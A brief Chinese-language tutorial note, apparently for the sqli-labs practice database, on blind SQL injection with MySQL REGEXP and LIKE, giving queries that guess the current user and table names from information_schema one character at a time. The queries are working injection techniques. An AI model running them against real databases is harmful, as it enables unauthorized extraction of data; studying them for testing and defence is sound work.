使用regexp来进行注入

匹配到则返回1,否则返回0

这条语句返回1
1
SELECT USER( ) REGEXP'^root'

猜解user()

1
2
select * from users where id=1 and 1=(if((user() regexp '^r'),1,0));
select * from users where id=1 and 1=(user() regexp'^ri');

猜解表名

1
2
select * from users where id=1 and 1=(select 1 from information_schema.tables
where table_schema='security' and table_name regexp '^us[a-z]' limit 0,1);

这条语句如果匹配到则返回1,否则返回空白

1
2
select 1 from information_schema.tables
where table_schema='security' and table_name regexp '^us[a-z]' limit 0,1

另外一种姿势

同样的根据like也可以注入

1
SELECT USER() LIKE "%ros%"

匹配则返回1,否则0